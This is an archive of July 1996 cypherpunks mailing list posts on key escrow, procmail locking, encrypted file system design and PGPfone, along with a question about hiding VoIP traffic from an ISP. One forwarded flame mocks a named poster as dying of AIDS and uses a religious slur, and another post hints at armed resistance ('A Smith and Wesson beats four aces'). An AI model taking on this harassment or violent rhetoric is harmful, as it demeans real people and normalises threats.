>For example... there are many anti-Castro 'democratic' socialists in Cuba.
>If you approach them as if they were anti-Communists you'll be seen 
>as a clueless kook.  Some Chinese I have spoken to are suspicious of 
>the Tiennamen Sq. activists, claiming they were more 'reformists' 
>than true democratizers who were unknown before Tiennamen. 

Clearly, in our document we will take no political positions whatsoever. We
merely point out that if you wish to communicate securely such that only the
recipient(s) can decipher, this is how you go about it. They'll know how to
use it, this is a problem they face daily, with phone tappings, bugs, etc. a
routine.

>
>One more important issue: people have to trust you.  You can't go 
>into a strange environment and expect trust if you come off as a 
>tourist.

You are selling yourself short. People who have (successfully?) fought the
US government are likely to get a trust bonus among activists anywhere they
go ;-)


You asked about me, I've put up a little information on
http://www.cerfnet.com/~amehta/ 
I'd be happy to fill in the blanks.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Mon, 15 Jul 1996 06:30:09 +0800
To: mcarpent@mailhost.tcs.tulane.edu
Subject: Re: Execution of signed scripts received by e-mail
In-Reply-To: <199607141042.FAA01300@Dusk.obscure.net>
Message-ID: <m2pw5yu10s.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Matt" == Matt Carpenter <mcarpent@Dusk.obscure.net> writes:
>>>>> "Hal" == Hal <hfinney@shell.portal.com> writes:

Hal> That sounds very impressive!  The one problem I've run into with
Hal> mail filtering software is that each message asynchronously
Hal> spawns a separate filter process.  This can cause some conflicts
Hal> with accessing disk files.

Matt> If I am reading the procmail docs correctly, then the following
Matt> recipe should create a lockfile called 'emscrypt.lock' which
Matt> will prevent more than one instance of the script from being run
Matt> at a time

Matt> :0:emscrypt
Matt> ^ Subject.*SQUEAMISH OSSIFRAGE
Matt> |/PATH/emscrypt

That is half correct.  It will only create emscrypt.lock if you have
configured procmail for that kind of locking, otherwise it will use
lockf or flock to make the lock.

As Hal pointed out, you will still have one process per message, but
they will be processed one at a time.

Matt> I agree it would be better if emscrypt used its own locks on the
Matt> timestamp files.  However, it is my understanding (someone
Matt> please correct me if I am wrong) that there is no simple way to
Matt> provide file locking in Perl that is portable across the various
Matt> flavours of Unix (see the descriptions of the fcntl and flock
Matt> functions on p. 144-145 of the Camel book).

Another possibility is to call lockfile (a program included with
procmail which performs compatible locking).

You're better off using procmail's locking as it does what you're
looking for, and many people have beat on the code over the years.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 15 Jul 1996 03:51:49 +0800
To: root@mail.demon.net
Subject: Re: Failed mail
Message-ID: <9607141612.AA14447@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Jul 96 at 22:22, root@mail.demon.net wrote:

Could you please explain me why my message was blocked?

P.S. any CPunks who could answer my questions below?
Please reply by e-mail.

Thanks


---------- begin quoted message -------------

> Whilst talking to mist.demon.co.uk:
> 
>   MAIL FROM:<jf_avon@citenet.net>
>   503 Local policy blocks mail from <jf_avon@citenet.net>
> 
> ------ Original Message Follows ------
> 
>   Received: from punt-1.mail.demon.net by mailstore for iolo@mist.demon.co.uk
>             id 837281345:17284:1; Sat, 13 Jul 96 19:09:05 BST
>   Received: from cti02.citenet.net ([198.53.26.132]) by punt-1.mail.demon.net
>             id aa16801; 13 Jul 96 19:08 +0100
>   Received: from g34-138.citenet.net by cti02.citenet.net (4.1/SMI-4.1)
>   	id AA13507; Sat, 13 Jul 96 13:17:50 EDT
>   Message-Id: <9607131717.AA13507@cti02.citenet.net>
>   Comments: Authenticated sender is <jf_avon@pop.citenet.net>
>   From: "Jean-Francois Avon" <jf_avon@citenet.net>
>   Organization: JFA Technologies
>   To: Edgar Swank <edgar@Garg.Campbell.CA.US>
>   Date: Sat, 13 Jul 1996 13:13:33 -0500
>   Subject: SecureDrive(IDEA), Realdeal and plaintext attack
>   Reply-To: jf_avon@citenet.net
>   Cc: Iolo Davidson <iolo@mist.demon.co.uk>,
>           Arnoud "Galactus" Engelfriet <galactus@stack.urc.tue.nl>
>   Priority: normal
>   X-Mailer: Pegasus Mail for Windows (v2.32)
>   
>   Hi!
>   
>   I wrote to you the other day to send you my config files (excepted 
>   Galactus).
>   
>   Just to refresh your memory:
>   
>   I use Secure Drive 1.4a on my data drive.
>   
>   While running Win3.11wg (with dos7 with locked drives), I load 
>   realdeal.exe /pers  .
>   
>   
>   Question: 
>   
>   Since realdeal overwrite everything with 0s, and that theses
>   zeroed sectors are encrypted later with IDEA, will that give an
>   attacker an edge?  The attacker will likely know that there are
>   large disk areas that contains 0s.
>   
>   Any comments?
>   
>   Thanks
>   
>   jfa
>   
>    DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
>    JFA Technologies, R&D consultants: physicists, technologists and engineers.
>   
>    PGP keys at: http://w3.citenet.net/users/jf_avon
>    ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
> 
> 
-------- end quoted message ---------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jul 1996 07:29:02 +0800
To: cypherpunks@toad.com
Subject: Re: Dep. AG Gorelick on CSPAN2 advocating escrow
Message-ID: <ae0e969b01021004a5a1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:34 PM 7/13/96, Deranged Mutant wrote:
>Saw Jamie(?) Gorelick, Dep. Attny Gen. on CSPAN2 talking about needs
>for key escrow. Emphasized the what if people lose their keys, or
>someone dies, or if an employee steals company secrets & encrypts
>them... rather than the usual what if terrorists use crypto line
>(though she did mention that too).
>
>Guess they're taking a new tack to sell it to the public.  A lot of
>bunkum... (project left to the reader how these can be handled in a
>non-GAK manner).

And as we all know, having discussed this many times, even if one buys
these arguments for the advantages of key escrow, THEY DO NOT APPLY TO
COMMUNICATIONS!

That is, imagine Alice and Bob communicating over some channel. Alice has
files on her computer. Putatively, if she dies, leave her company,
whatever, it is desired to reconstruct these files. Fine. A potential use
for key escrow. (If voluntary, of course.)

But what does this have to do with a channel between Alice and Bob? Why
should the keys for this channel ever need to be escrowed for the reasons
Gorelick cites? After all, Alice has the files she sent stored locally, and
Bob presumably has the same files he received.

There is essentially no rationale for escrowing the keys of a transient
communication.

The Administration and even cryptologists apologizing for GAK (who ought to
know better) are curiously silent on this rebuttal to their claims.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 15 Jul 1996 05:29:14 +0800
To: cypherpunks@toad.com
Subject: [LONG,FUNNY,NOISE] Cypherpunk wannabe threatens a lawsuit :-)
Message-ID: <22D3qD135w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks, I offer these two Usenet articles for your amusement.

In article 1, I follow up on Bruce Bough's article, and, among many other
things, defend his right to vote (questioned by the orthodox Jewish homophobe
Dan Hartung). (It's very long and technical, so you can skip it.)

In article 2, Bruce Bough follows up on my article and threatens to prosecute
me under the Americans with Disability Act for misspelling his name.

This is almost as funny as his litanies about his dementia and memory loss.

Have fun.

Article 1:

===============================================================================
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Newsgroups: news.admin.net-abuse.misc,news.admin.censorship,news.admin.policy,alt.config,news.groups,alt.journalism,atl.general,alt.culture.usenet,alt.internet.media-coverage,alt.wired,alt.cyberspace,talk.politics.misc,news.admin.net-abuse.misc,ga.general,misc.news.internet.discuss,soc.culture.russian,alt.flame.jan-isley,talk.forgery,alt.usenet.kooks,alt.grelb
Subject: Re: Towards A Usenet Social Contract
References: <4rpvfi$smg@doc.jmu.edu> <4rv6m7$3ns_002@mycroft.kenosis.com>
Message-ID: <i6a1qD209w165w@bwalk.dm.com>
Date: Sat, 13 Jul 96 09:25:41 EDT

In article <4rv6m7$3ns_002@mycroft.kenosis.com>,
bruce@kenosis.com (Bruce Baugh) wrote:
>In article <4rpvfi$smg@doc.jmu.edu>, bumgarls@falcon.jmu.edu (Lee S. Bumgarner) wrote:
>
>>Is a little premeditation too much to ask for a smoothly working system?
>
>Yes. The _only_ info the voting process needs to know is whether the
>voter is a unique individual. This is in practical terms not an
>achievable task. But processes like serialized authenticated ballots at
>least move in that direction. Voter registration that gathers _any_ info
>beyond establishing the legitimacy of the address is a step in the wrong
>direction. Information not in hand can't be abused, and I see great
>potential for abuse of any sort of repository of information about voter
>interests, preferences, etc.
>
>Further, any step toward increasing centralization seems to me counter
>to the fundamental paradigm of Usenet, which owes its survival to its
>decentralized nature. No system with anything like a real center could
>have survived the growth of recent years. One of the last things we need
>(in addition to info that can be put to abusive purposes being
>collected) is any additional bottleneck.
>
>>in my opinion, prevents this system from being viable. If we have a
>>registration system, then the cabal would be small, say 20 or so people.
>>They would not be system admins, simply interested readers.
>
>I give you...news.groups. All that's necessary of this concept exists.
>Further, by functioning in an ungoverned environment, it ensures that
>what status people have is _earned_ by virtue of their views and
>arguments.  The current system is completely open to addition of new
>figures to the pantheon. Again, centralization creates the potential for
>bottlenecks.
>
>I don't trust _anyone_ with the power to establish a "cabal" of this
>sort. I start with myself. Anyone who holds strong views of matters of
>controversy faces the problem of bias, and anyone not informed enough
>to hold views on them has no business selecting authority figures.

I remember how someone recently argued on news.groups that Bruce Bough's votes
should be invalidated because he's dying from AIDS. I strongly disagree with
Dan's (?) reasoning, which was, I recall, that someone with only a couple of
months left to live shouldn't be telling others how to run Usenet after his
death. I think we should consider Bruce's opinions as being representative.
After all, a Usenet vote is an interest poll, and the voters are just a sample
of a larger population. Not everyone who thinks like Bruce Bough is going to
die together with him from AIDS within a few months (sigh). Let him vote.

The use of numbered ballots (as proposed by Dr. Grubor and implemented by me),
will stop the following kinds of net-abuse:

* Cabal supporters such as Russ Allberry (spit) e-mailing pre-filled ballots to
their mailing lists, sometimes gathering tens of thousands of votes from people
who haven't read the CFV;

* Cabal supporters forging cancels to censor Usenet articles they claim contain
"unauthorized voting instructions". This pretext has been used to stifle
campaigning against the proposals the Cabal wanted to pass, as well as to
suppress protests against UVV misconduct by Jan Isley (spit) and his cohorts.

The use of a simple randomized question about the CFV - find the line that says
this and fill in the missing word on the ballot (as proposed by Dr. Grubor and
implemented by me), will stop the following kinds of net-abuses:

* Cabal supporters such as Stephanie da Silva (spit) vote YES on every
moderated newsgroup without reading the CFV;

* Cabal supporters such as Chris Stein (spit) vote NO on every unmoderated
newsgroup without reading the CFV.

There can be no pre-filled ballots under Dr. Grubor's proposal.

But Dr. Grubor's proposals don't address the issue of votetaker fraud. For
example, we've exposed Jan Isley (spit) as a liar and a forger, who frivolously
"invalidated" or "lost" votes from people he didn't like (including myself),
and forged cancels for their protests on news.groups. Emory University called
Isley's (spit) forgeries "reprehensible" and pulled his plug for net-abuse.

The UVV's refusal to use numbered ballots and to ask (simple) questions about
the CFV on the ballot is just a lame excuse. They really want to be able to
forge cancels for protests posted to news.groups about votetaker misconduct.

For example, of the following dozen votes I've cast, I've only received an ack
for my NO vote on soc.culture.israel.moderated (fuck you, Jonathan Kamens).

Where are the acks for the following ballots:

1. I e-mailed voting@hut.fi and wrote:

I vote NO on soc.culture.israel.moderated

I received an ack (thank you, Jani).

2. I e-mailed voting@hut.fi and wrote (ballot mark skipped):

>Voter name: Dr. Dimitri Vulis
>
>| Insert YES, NO, ABSTAIN, or CANCEL inside the brackets for each
>| newsgroup listed below (do not delete the newsgroup name):
>
> Your Vote   Newsgroup
> ---------   -----------------------------------------------------------
>[ NO      ]  rec.arts.comics.marketplace.forsale
>[ NO      ]  rec.arts.comics.marketplace.wanted

So far, I received no ack.

3. I e-mailed voting@hut.fi and wrote:

>I vote YES on rec.games.bridge.okbridge

So far, I received no ack.

4. I e-mailed voting@hut.fi and wrote:

>I vote YES on soc.adoption.parenting

So far, I received no ack.

5. I e-mailed mtac@infobahn.net and wrote:

>I vote NO on misc.transport.air-industry.cargo

So far, I received no ack.

6. I e-mailed ccmp@infobahn.net and wrote:

>I vote YES on comp.cad.microstation.programmer

So far, I received no ack.

7. I e-mailed ceg@infobahn.net and wrote:

>I vote YES on comp.emulators.game-consoles

So far, I received no ack.

8. I e-mailed smo@infobahn.net and wrote:

>I vote NO on sci.med.obgyn

So far, I received no ack.

9. I e-mailed saf@infobahn.net and wrote:

>I vote YES on sci.agriculture.net

So far, I received no ack.

10. I e-mailed david.bostwick@chemistry.gatech.edu and wrote:

>Give your real name here: Dr. Dimitri Vulis
>If you do not give your real name, your vote may be rejected.
>
>[Your Vote]  Group (Place your vote below in the brackets next to the group)
>-------------------------------------------------------------------------
>[YES      ]  comp.lang.dfl

So far, I received no ack.

11. I e-mailed david.bostwick@chemistry.gatech.edu and wrote:

>Give your real name here: Dr. Dimitri Vulis
>If you do not give your real name, your vote may be rejected.
>
>[Your Vote]  Group (Place your vote below in the brackets next to the group)
>-------------------------------------------------------------------------
>[ YES      ] misc.invest.misc (renames misc.invest)
>[ YES      ] misc.invest.mutual-funds (renames misc.invest.funds)
>[ YES      ] misc.invest.options
>[ YES      ] misc.invest.marketplace

So far, I received no ack.

12. I e-mailed dhartung@mcs.com and wrote:

>Give your real name here: Dr. Dimitri Vulis
>If you do not give a real name on the above line your vote may be rejected.
>
>[Your Vote]  Group
>-----------------------------------------------------------------------
>[NO       ]  soc.religion.paganism

So far, I received no ack.

What's going on? Why are 11 of my ballots not being acknowledged?
===============================================================================

Article 2:

===============================================================================
Path: ...!newsfeed.internetmci.com!usenet.eel.ufl.edu!psgrain!rainrgnews0!news.aracnet.com!mycroft
From: bruce@kenosis.com (Bruce Baugh)
Newsgroups: news.admin.net-abuse.misc,news.groups,alt.usenet.kooks
Subject: Re: Towards A Usenet Social Contract
Date: Sun, 14 Jul 96 00:17:16 GMT
Organization: Kenosis Design
Lines: 29
Message-ID: <4s9eac$1ag_006@mycroft.kenosis.com>
References: <4rpvfi$smg@doc.jmu.edu> <4rv6m7$3ns_002@mycroft.kenosis.com> <i6a1qD209w165w@bwalk.dm.com>
NNTP-Posting-Host: ppp-u11.aracnet.com
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
X-Newsreader: News Xpress 2.0 Beta #2

In article <i6a1qD209w165w@bwalk.dm.com>, dlv@bwalk.dm.com (Dr. Dimitri Vulis) wrote:

>of a larger population. Not everyone who thinks like Bruce Bough is going to
>die together with him from AIDS within a few months (sigh). Let him vote.

Dimitri, I invite you to pick a date, not more than twelve months in the
future, beyond which you're certain I will die. I will then post the
next day.

Not, of course, that I expect you to have the honor to admit now that
you're deliberately misreading and misunderstanding my posts, nor to
admit in the future that you made a claim demonstrably wrong.

Nor, I see, can you spell my name correctly, even though you quote it
routinely in reply lines and sig files. People who can't read what's in
front of them on screen lose credibility when it comes to proposing
sweeping changes and radical innovations in software.

Further, you might want to read up on the Americans With Disabilities
Act. Slanderous and defamatory statements about the handicapped - and my
government agrees that I do have a real problem, though it's not AIDS -
open you up to interesting liability.

Bruce Baugh <*> bruce@aracnet.com <*> http://www.aracnet.com/~bruce
See my Web pages for
    New science fiction by Steve Stirling and George Alec Effing er
    Christlib, the mailing list for Christian and libertarian concerns
    Daedalus Games, makers of Shadowfist and Feng Shui
Unsolicited commercial e-mail will be proofread at $50/hour, min $100.
===============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 14 Jul 1996 20:33:39 +0800
To: Harry Hochheiser <harry@tigger.jvnc.net>
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
In-Reply-To: <199607131454.AA13554@tigger.jvnc.net>
Message-ID: <Pine.OSF.3.91.960714123249.32693A-100000@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jul 1996, Harry Hochheiser wrote:

> On 12 Jul 96 at 21:31, Arun Mehta wrote:
> 
> >VSNL, my government-owned
> > ISP (which also has a monopoly on all international traffic) made me
> > sign that I will not use my Internet connection for voice traffic.
> > Is there any way they could find out if I were using PGPfone, or
> > rather, could I prevent them from finding out? 

> Most Internet telephony systems use UDP packets to transfer speech, 
> since the lower overhead of UDP (as opposed to TCP) allows for better 
> throughput.      I assume (but I'm not certain) that PGPfone works 
> the same way.
> 
> Unfortunately, most of your other TCP/IP communication will be based 
> on TCP packets.  Therefore, it's theoretically possible for your ISP 
> to monitor your traffic, watching for large numbers of UDP packets.  

Thanks for the input.

Is UDP used for other purposes not related to voice that I might pretend 
to be doing? Or is there still some way of fooling them?

Arun

> 
> 
> 
> ---------------
> Harry Hochheiser           harry@tigger.jvnc.net
> 08 3A B5 F6 47 7F C7 C4 28 B4 8D D2 2E DF F6 1E
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 15 Jul 1996 06:30:20 +0800
To: coderpunks@toad.com
Subject: Encrypted file systems
Message-ID: <199607141148.MAA00279@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Some more thoughts on encrypted file system design criteria.

A wish list:

- Choice of secret key encryption algorithms (IDEA, 3DES, MDC, Blowfish)

- Multiple architectures (MSDOS, Win31, Win95, WinNT, Unix, Mac)

- High performance (hand optimised assembler for each architecture)

- Compression

- Ability to chain algorithms (IDEA and then 3DES for example)

- Possible to have encrypted file systems on separate partitions, or

- Encrypted file system located in a file in another file system 
  (much like DOS stacker drives) this is an ease of use criteria -- I
  suspect re-partitioning drives would put off many potential users.

- Ease of use.  Graphical user interface for setup and administration
  functions, with a very simple set of configurations options
  displayed by default, with more advanced configuration options
  available in "expert" mode.

- All directory and FAT information should be encrypted, so that
  it is not possible to discover even number of files, or percentage
  of disk used without the key

- Facility for duress key, with the real data hidden in the unused
  space of the first encrypted drive.  To increase the plausible
  deniability all unused blocks within a file system should be filled
  with garbage, so that it is not possible to tell if there is more
  data there.

- File system steganographically hidden in files on another file
  system (encrypted or not).  Support for a wide selection of file
  formats (Aiff, Wave, Midi, JPEG, GIF, RGB, MPEG).

- Ability to use stegoed file system in files on an unencrypted
  file system, and boot from a floppy to access stegoed file system,
  with no other traces left on hard disk.

Thought for the day: the main barrier for a Chinese dissident to using
such software is that being caught with a boot floppy with the
software for a stegoed drive would be dangerous.  What would solve
this would be if Microsoft, Apple, UNIX vendors, Slackware linux
included this functionality (or this software itself as useful
freeware included with the CD distribution) in their respective O/Ses
as non-optional modules -- that is you get the software installed
whether you want it or not.  If everyone has the software, mere
possesion of the software no longer is a problem.

Throw in a few useful utilities, like a steganographic interface to
anonymous remailers, the address of a few ftp/www by email services,
and you have a system with interesting possibilities.

To improve the national security of the US, the NSA should be dropping
CDs with such software (much like war-time propoganda leaflets air
dropped) on undemocratic countries with poor human rights records.
Instead they expend their efforts on ITAR...

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Mon, 15 Jul 1996 07:59:45 +0800
To: Adam Back <cypherpunks@toad.com
Subject: Re: Encrypted file systems
In-Reply-To: <199607141148.MAA00279@server.test.net>
Message-ID: <9607141307.TE28806@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 14, 12:48, Adam Back wrote:
> Subject: Encrypted file systems
> - Encrypted file system located in a file in another file system 
>   (much like DOS stacker drives) this is an ease of use criteria -- I
>   suspect re-partitioning drives would put off many potential users.

There are a couple of advantages to this sort of approach (i.e. 
having the encrypted filesystem live in file(s) on an ordinary 
filesystem) other than ease of use. 

1. Backups are easy. One can use whatever backup software one normally
uses.

2. The encrypted filesystem can actually live on a remote file server 
with data being encrypted/decrypted on the fly on the local host. (of 
course, you have to consider the security risks that you get from 
being on a network). 


-- 
Mark Henderson -- mch@squirrel.com, henderso@netcom.com, markh@wimsey.bc.ca
ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1  A1 2A 2A 06 4A D5 92 46
unstrip for Solaris, Wimsey crypto archive, TECO, computer security links,
change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Mon, 15 Jul 1996 08:09:28 +0800
To: cypherpunks@toad.com
Subject: My impending death
Message-ID: <2.2.32.19960714203307.006d90c4@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Since Vulis decided to drag in a disagreement from elsewhere, I have a brief
invitation.

He says I'm going to die in the next few months. My birthday is in October.
So on my birthday in 1997, I'm going to have a party. All present will be
invited to petition Vulis for more oracular pronouncements about the fate of
past and present posters to Cypherpunks.

In the meantime, I give thanks to the God of Killfiling, and fire mine up.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Jul 1996 08:57:08 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <199607142039.NAA14185@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 AM 7/14/96 -0700, David Sternlight wrote:
>At 7:05 AM -0700 7/13/96, Deranged Mutant wrote:

>>This is particularly problematic... if the mainland Chinese gov't
>>requested a key from a N.Amercian or European (or even UN controlled)
>>escrow agency, who is to say it isn't really for political reasons
>>(even though they may claim the persons are drug smugglers)?
>>
>>Or what if the 'crime' was, say, discussing Mormon beliefs, which is
>>illegal in Singapore (and I think Russia as well)?
>>
>>Or what if some terrorist was using keys escrowed in a country that
>>sponsered terrorist acts?
>
>Your best shot would be to make sure the part about the system being
>voluntary was hard-wired into any legislation or rule-making. 

Wrong.  Our "best shot" is to ensure that no "key escrow" legislation is 
adopted, and moreover export restrictions on crypto are eliminated.  _THAT_ 
is "our best shot."   The obvious problem with writing "voluntary" into any 
legislation (and thinking it actually means something!)  is that there is a 
vast difference between the dictionary definition of the word "voluntary", 
and the way the USG would like to interpret it.  

I think most people define "voluntary" as something which is a free choice, 
devoid of coersion.  But that's already damaged when the government's 
involved.  Aside from robbing us of our assets in the form of taxes, the 
fact that it was able to do things like harass Phil Zimmermann for a few 
years (when, if there had been a "regulation"  concerning writing 
encryption, it would have said, "writing encryption is unrestricted and 
VOLUNTARY") clearly proves that the government tries to do manipulate us 
regardless of friendly terminology like "voluntary."

Clipper was always claimed to be "voluntary," but more recently they added 
to the restrictions, for example saying that a Clipper-type crypto phone 
can't be allowed to operate when connected to a non-escrow telephone.  
Again, the government is getting further and further away from "voluntary" 
as most of us understand the term.

More importantly, I believe that the most fundamental right the public has 
is to be able to REFUSE a benefit.  Let's suppose, hypothetically, that we 
"all" could agree that that GAK would provide net advantages and benefits to 
the public.  I assert that despite this, the public is and should still be 
completely free to _refuse_ these benefits, and to go without GAK.  This 
position, the truth of which is obvious to most of the readers of CP, would 
astonish and frustrate government employees and their sympathizers.  

Today, it appears that the vast majority of those that are paying attention 
to this issue agree that GAK is NOT desirable, and in any case they don't 
want it.  The simple conclusion is that as long as we aren't supposed to 
have a dictatorship in this country, the will of the public to _refuse_ the 
claimed benefit should be respected and followed.  Under those conditions, 
GAK wouldn't and couldn't happen.

>Unless and until ITAR is modified by Congress,

Congress didn't write ITAR, nor did it approve ITAR.   However, the Burns 
crypto bill will, apparently, negate most if not all of the influence of 
ITAR on crypto.

> the USG has what Mark Twain called "the
>calm confidence of a Christian with four aces" on this matter.

"A Smith and Wesson beats four aces."  And if the government keeps pushing, 
it'll come to this.


> That
>is--unless and until Congress acts, the Administration has absolute
>discretion with respect to the conditions under which they will liberalize
>the administration of ITAR.

That's not clear.  The _constitutionality_ of the application of ITAR to 
encryption is challengeable in court, with or without any actions by 
Congress.  So they DON'T have "absolute discretion."  Furthermore, 
regulations must (at least theoretically) conform to law.  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 15 Jul 1996 05:38:39 +0800
To: mcarpent@mailhost.tcs.tulane.edu
Subject: Re: Execution of signed scripts received by e-mail
In-Reply-To: <199607141042.FAA01300@Dusk.obscure.net>
Message-ID: <199607141903.OAA20371@homeport.org>
MIME-Version: 1.0
Content-Type: text


Matt Carpenter wrote:

| If I am reading the procmail docs correctly, then the following recipe
| should create a lockfile called 'emscrypt.lock' which will prevent more than
| one instance of the script from being run at a time
| 
| :0:emscrypt
| ^ Subject.*SQUEAMISH OSSIFRAGE
| |/PATH/emscrypt
| 
| I agree it would be better if emscrypt used its own locks on the timestamp
| files.  However, it is my understanding (someone please correct me if I am
| wrong) that there is no simple way to provide file locking in Perl that is
| portable across the various flavours of Unix (see the descriptions of the
| fcntl and flock functions on p. 144-145 of the Camel book).  So I haven't
| tried to implement locking from within emscrypt yet.  Of course, if these
| functions are available on the majority of machines (anyone?) then I should
| probably use them.

	procmail includes a program called lockfile, which is based on
its thorough as hell lock mechanism tests.  If you're calling from
procmail, you might decide to require lockfile.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 15 Jul 1996 09:41:30 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
In-Reply-To: <199607142039.NAA14185@mail.pacifier.com>
Message-ID: <v03007602ae0f100db975@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713593.multipart/signed"

--Boundary..3943.1071713593.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

At 2:37 PM -0700 7/14/96, jim bell wrote:
>At 10:17 AM 7/14/96 -0700, David Sternlight wrote:
>>At 7:05 AM -0700 7/13/96, Deranged Mutant wrote:
>
>>>This is particularly problematic... if the mainland Chinese gov't
>>>requested a key from a N.Amercian or European (or even UN controlled)
>>>escrow agency, who is to say it isn't really for political reasons
>>>(even though they may claim the persons are drug smugglers)?
>>>
>>>Or what if the 'crime' was, say, discussing Mormon beliefs, which is
>>>illegal in Singapore (and I think Russia as well)?
>>>
>>>Or what if some terrorist was using keys escrowed in a country that
>>>sponsered terrorist acts?
>>
>>Your best shot would be to make sure the part about the system being
>>voluntary was hard-wired into any legislation or rule-making.
>
>Wrong.  Our "best shot" is to ensure that no "key escrow" legislation is
>adopted, and moreover export restrictions on crypto are eliminated.

Nope. That's some people's preferred shot, but may not be the best one or
even a realistic one. It's certainly a partisan political advocacy (in the
sense that people are partisan about this issue, not in the sense of a
particular political party). Yet that attitude didn't get any legislation
to stop Clipper I.

My point was very simple--if the government is going to say a system is
voluntary, make them put it in writing in the rules or legislation. We
failed to do that with Clipper I (when they said in non-rulesmaking
statements that they had no intention of making escrow mandatory--but
nobody said "OK. Put it in writing as a formal policy."). As a result, many
in government even at the higher policy-making levels are still calling for
mandatory escrow. Had it been in the rules, it's less likely they could
have overtly gone against a rules-making covenant/compromise.

It's simple pragmatic regulatory politics. It's how the system works, and
using the system itself to achieve one's goals is one of the more powerful
techniques around. You don't have to like it, but you do have to decide
whether you'd rather be "right" or get the result.

David



--Boundary..3943.1071713593.multipart/signed
Content-Type: application/octet-stream; name="pgp00004.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00004.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
CmlRQ1ZBd1VBTWVsaGgwd2dIK05ZclE4MUFRR0Qvd1ArT0dCYUVrVVc1eUtL
NlBPaXR0THNDZUFZSGVDVVlISm0KN2t6Z0lQdEE5bEo5bjQxTmJOTXN3WVlI
cTU4eEFFOFkyalRCNjVWOEtFTzd1cy9iK0MyZm5iLzdnNXRSdUQxWgpvU25t
cUM3TVJkNk8rb3BoaGxTSEtOK041b1hEcHQ2TWxMblJtR1R5VVBTTkM1Uy8z
ZXE0VHZzMXFDWmZPSmxhCmNNTHliZXlLRGhjPQo9R2l4eQotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3943.1071713593.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 15 Jul 1996 06:42:57 +0800
To: cypherpunks@toad.com
Subject: Markoff on Clipper III
Message-ID: <2.2.32.19960714183322.0082efd0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


